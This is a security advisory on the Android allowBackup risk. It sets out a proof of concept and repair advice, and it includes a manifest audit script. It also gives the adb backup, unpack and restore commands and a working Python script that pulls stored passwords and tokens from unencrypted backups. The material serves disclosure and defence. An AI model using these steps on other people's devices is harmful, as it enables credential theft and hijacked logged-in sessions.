Security risks of allowBackup in Android attributes

Source: Internet
Author: User

1. allowBackup security risk description

Android has provided backup and restore of application data since API Level 8. Whether an application takes part is controlled by the android:allowBackup attribute on the <application> element of its AndroidManifest.xml [1]. The attribute defaults to true. When allowBackup is true (or simply not declared), the application's private data can be exported with adb backup and re-imported with adb restore, and that is where the security risk comes from.

adb backup lets anyone who can get USB debugging enabled on an unlocked phone (and, from Android 4.2.2 on, get the host's RSA key accepted on the device) copy the application's private data, that is its shared preferences, databases and files, to a computer. Unless the user types a password on the device's backup confirmation screen the backup file is not encrypted, so once the data has been exported it can be read in full. adb restore is the reverse operation: it takes a backup file as the data source and writes its contents back into the application's data directory. An attacker can therefore back up the data, install the same application on another phone or emulator, restore the backup there, and open the application in exactly the state it had on the victim's device, logged-in session included.

For messaging (IM) applications this means chat records can be read straight out of the backup, and a restored copy of the application opens in the victim's logged-in state without a password; for financial and payment applications an attacker who restores the session can make payments from the victim's account. For this reason developers should set allowBackup to false, which disables backup and restore for the application, to avoid information leakage and financial loss.


2. allowBackup security impact scope

Android API Level 8 and above.


3. allowBackup security risk details

1) Risk location: the android:allowBackup attribute of the <application> element in AndroidManifest.xml.

2) Prerequisite for triggering the risk: the android:allowBackup attribute in AndroidManifest.xml is absent or is not set to false (the platform default is true).

3) Risk principle: when allowBackup is true, adb backup and adb restore can export and re-import the application's private data.


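A check for the prerequisite in 2), written as an added example for this page (it is not code from the original article or from any Alibaba tool). It parses the merged AndroidManifest.xml as found in an APK, treats a missing allowBackup as true, and also accounts for the Android 12 rule that adb backup skips application data for apps targeting API 31 or higher unless android:debuggable="true". The sample manifests built by sample_manifest() are constructed here and mirror the shape of the page's POC manifest; the assumption that targetSdkVersion falls back to minSdkVersion when absent follows the platform's own rule.

```python
"""Audit an AndroidManifest.xml for the allowBackup exposure.

Added example, not the page's code. Assumes the merged manifest from the
APK is passed in (with its <uses-sdk> element, as in the page's POC).
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _android_attr(elem, name):
    """Read an android:<name> attribute; None if the element or attribute is absent."""
    if elem is None:
        return None
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def audit_allow_backup(manifest_xml):
    """Describe whether adb backup can export this application's private data.

    allowBackup defaults to true, so an absent attribute counts as enabled.
    From Android 12, adb backup excludes data of apps targeting API 31+
    unless android:debuggable="true". targetSdkVersion defaults to
    minSdkVersion when it is not declared. A manifest without <uses-sdk>
    is treated as exposed, since the restriction cannot be confirmed.
    """
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    uses_sdk = root.find("uses-sdk")

    allow_raw = _android_attr(app, "allowBackup")
    allow_backup = allow_raw is None or allow_raw.lower() != "false"
    debuggable = (_android_attr(app, "debuggable") or "false").lower() == "true"

    target_raw = (_android_attr(uses_sdk, "targetSdkVersion")
                  or _android_attr(uses_sdk, "minSdkVersion"))
    target_sdk = int(target_raw) if target_raw and target_raw.isdigit() else None

    findings = []
    if allow_raw is None:
        findings.append("android:allowBackup not declared; platform default is true")
    elif allow_backup:
        findings.append("android:allowBackup explicitly set to %r" % allow_raw)
    if debuggable:
        findings.append("android:debuggable=true re-enables adb backup data export on Android 12+")

    # Data reaches adb backup when backup is allowed and the API 31 restriction does not apply.
    restricted_by_api31 = target_sdk is not None and target_sdk >= 31 and not debuggable
    adb_backup_exposed = allow_backup and not restricted_by_api31

    return {
        "package": root.get("package"),
        "allow_backup": allow_backup,
        "target_sdk": target_sdk,
        "debuggable": debuggable,
        "adb_backup_exposed": adb_backup_exposed,
        "findings": findings,
    }


def sample_manifest(app_attrs="", sdk_attrs='android:minSdkVersion="10"'):
    """Constructed sample manifest with the same shape as the page's POC manifest."""
    return ('<?xml version="1.0" encoding="utf-8"?>'
            '<manifest xmlns:android="%s" package="com.alibaba.jaq.allowbackuppoc">'
            '<uses-sdk %s/>'
            '<application %s android:label="@string/app_name">'
            '<activity android:name="LoginActivity"/>'
            '</application></manifest>' % (ANDROID_NS, sdk_attrs, app_attrs))


if __name__ == "__main__":
    # The page's two POC manifests: attribute absent (exposed) and set to false (safe).
    for attrs in ("", 'android:allowBackup="false"'):
        print(attrs or "<no allowBackup attribute>", audit_allow_backup(sample_manifest(attrs)))
    # Beyond the page: an app targeting API 31 is only exposed when it is debuggable.
    sdk31 = 'android:minSdkVersion="21" android:targetSdkVersion="31"'
    print("target 31", audit_allow_backup(sample_manifest("", sdk31))["adb_backup_exposed"])
    print("target 31, debuggable",
          audit_allow_backup(sample_manifest('android:debuggable="true"', sdk31))["adb_backup_exposed"])
```

Run it against the manifest pulled from a decoded APK rather than the project source: Gradle merges targetSdkVersion and library manifests into the final file, and that merged result is what the device evaluates.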
4. allowBackup risk POC

1) If the allowBackup attribute is not set in AndroidManifest.xml, its default value "true" applies and the application's entire data directory can be backed up with the adb command.

AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.alibaba.jaq.allowbackuppoc"
    android:versionCode="1"
    android:versionName="1.0">
    <uses-sdk android:minSdkVersion="10"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <application
        android:label="@string/app_name">
        <activity android:name="LoginActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".HomeActivity"/>
    </application>
</manifest>


After the POC application is started, the user logs in (the original shows the login screen and the post-login screen side by side as screenshots).

With the application logged in, its data is backed up with the adb command (screenshot of the adb backup command and the device's backup confirmation prompt in the original).

The backup file "allowBackup.ab" is unpacked with Android Backup Extractor [3], written by Nikolay Elenkov; the extracted data contains the POC application's stored login user name and password (screenshot in the original).

On another Android phone, the POC application is installed fresh and the backup taken above is restored to it, which brings the newly installed application to the logged-in state:

Before restore: the newly installed application shows the login screen.

After tapping "Restore my data" on the device's restore confirmation prompt, the data is written back without any user name or password being entered; tapping the application icon opens it directly in the logged-in state (screenshots in the original).


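The commands behind the screenshots above are adb backup -f allowBackup.ab com.alibaba.jaq.allowbackuppoc on the victim's phone, java -jar abe.jar unpack allowBackup.ab allowBackup.tar to turn the file into a plain tar with Android Backup Extractor, and adb restore allowBackup.ab on the attacker's phone. The block below is an added example for this page, not code from the original article and not Android Backup Extractor itself: it reads the unencrypted .ab format (a four-line header of magic, version, compressed flag and encryption method, followed by a zlib stream of a tar) and pulls the login credentials out of the application's shared preferences, which is what the "decryption" step shows. It covers only the unencrypted case; a backup for which the user chose a password is AES-encrypted and needs that password (ABE handles it). The backup file is constructed in memory so the example runs offline, using the apps/<package>/sp/ layout adb backup writes; build_sample_backup(with_app_data=False) produces the empty backup that the second POC (allowBackup="false", below) describes.

```python
"""Unpack an unencrypted adb backup (.ab) and recover stored credentials.

Added example, not the page's code and not Android Backup Extractor. The
sample backup is constructed here so the code runs without a device.
"""
import io
import tarfile
import xml.etree.ElementTree as ET
import zlib

MAGIC = b"ANDROID BACKUP"
PACKAGE = "com.alibaba.jaq.allowbackuppoc"


def parse_ab_header(data):
    """Split the four-line header: magic, format version, compressed flag, encryption."""
    magic, version, compressed, encryption, payload = data.split(b"\n", 4)
    if magic != MAGIC:
        raise ValueError("not an adb backup file")
    return int(version), compressed == b"1", encryption.decode("ascii"), payload


def unpack_ab(data):
    """Return {tar member name: bytes} for an unencrypted backup."""
    version, compressed, encryption, payload = parse_ab_header(data)
    if encryption != "none":
        raise ValueError("backup is %s-encrypted; the backup password is required" % encryption)
    tar_bytes = zlib.decompress(payload) if compressed else payload
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
        return {m.name: tf.extractfile(m).read() for m in tf.getmembers() if m.isfile()}


def extract_shared_prefs(files, package):
    """Flatten every shared_prefs XML of <package> into {pref file: {key: value}}."""
    prefix = "apps/%s/sp/" % package
    prefs = {}
    for name, blob in files.items():
        if name.startswith(prefix) and name.endswith(".xml"):
            root = ET.fromstring(blob)
            # <string> entries carry their value as text; boolean/int/... use a value attribute.
            prefs[name[len(prefix):]] = {
                child.get("name"): child.text if child.text is not None else child.get("value")
                for child in root
            }
    return prefs


def credentials_from_backup(data, package=PACKAGE):
    """The attacker's view: every credential-looking key, straight out of the .ab file."""
    prefs = extract_shared_prefs(unpack_ab(data), package)
    hits = {}
    for pref_file, entries in prefs.items():
        for key, value in entries.items():
            if any(word in key.lower() for word in ("pass", "token", "secret", "session")):
                hits["%s:%s" % (pref_file, key)] = value
    return hits


def build_sample_backup(with_app_data=True, compressed=True, version=1):
    """Constructed sample: tar in adb backup's layout, zlib-compressed, with a v1 header.

    with_app_data=False yields the empty backup an allowBackup="false" app produces.
    """
    login_xml = (b'<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n<map>\n'
                 b'  <string name="username">alice</string>\n'
                 b'  <string name="password">s3cret-passw0rd</string>\n'
                 b'  <boolean name="logged_in" value="true" />\n</map>\n')
    members = []
    if with_app_data:
        members = [("apps/%s/_manifest" % PACKAGE, b"1\n" + PACKAGE.encode() + b"\n"),
                   ("apps/%s/sp/login.xml" % PACKAGE, login_xml)]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, blob in members:
            info = tarfile.TarInfo(name)
            info.size = len(blob)
            tf.addfile(info, io.BytesIO(blob))
    tar_bytes = buf.getvalue()
    header = b"%s\n%d\n%d\nnone\n" % (MAGIC, version, 1 if compressed else 0)
    return header + (zlib.compress(tar_bytes) if compressed else tar_bytes)


if __name__ == "__main__":
    sample = build_sample_backup()
    print(sorted(unpack_ab(sample)))
    print(credentials_from_backup(sample))
    print(credentials_from_backup(build_sample_backup(with_app_data=False)))
```

To use it on a real file, read allowBackup.ab into memory and pass the bytes to credentials_from_backup(); databases under apps/<package>/db/ come out of unpack_ab() the same way and can be opened with sqlite3 after writing them to disk.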
2) If allowBackup is set to false in AndroidManifest.xml, that is android:allowBackup="false", the application's data can no longer be backed up or restored with the adb command.

AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.alibaba.jaq.allowbackuppoc"
    android:versionCode="1"
    android:versionName="1.0">
    <uses-sdk android:minSdkVersion="10"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <application
        android:allowBackup="false"
        android:label="@string/app_name">
        <activity android:name="LoginActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".HomeActivity"/>
    </application>
</manifest>


After the POC application is started and the user logs in (screenshots in the original), its data is backed up with the adb command in the same way as before.

Unpacking the resulting backup file "allowBackup.ab" shows that it contains no data for the POC application: the backup captured nothing (screenshot in the original).

On another Android phone, the POC application is installed fresh and the restore is attempted:

Before restore: the newly installed application shows the login screen.

After the restore completes and the application is reopened, it is still at the login screen; the logged-in state was not carried over (screenshots in the original).


5. allowBackup risk repair suggestion

Alibaba Cloud universal security recommends setting the allowBackup attribute to false.

For security reasons, disable the application backup function: in AndroidManifest.xml set android:allowBackup="false" on the <application> element (the attribute belongs to <application>, not to individual activities or services), as in the following example:

<application
    android:allowBackup="false"
    android:label="@string/app_name">
    <activity android:name="LoginActivity"
        android:label="@string/app_name">
        <intent-filter>
            <action android:name="android.intent.action.MAIN"/>
            <category android:name="android.intent.category.LAUNCHER"/>
        </intent-filter>
    </activity>
    <activity android:name=".HomeActivity"/>
</application>

Two points to keep in mind when applying the fix. First, allowBackup="false" also opts the application out of Auto Backup to the user's Google account (API 23 and later); an application that needs cloud backup should instead keep credentials and session tokens out of the backed-up data, for example by excluding those files with android:fullBackupContent (API 23 and later) or android:dataExtractionRules (API 31 and later), and should never store a password in plain text in shared preferences in the first place. Second, starting with Android 12, adb backup no longer exports application data for applications that target API 31 or higher unless they declare android:debuggable="true"; this does not protect applications with a lower targetSdkVersion or installs on older devices, so the manifest setting is still required.

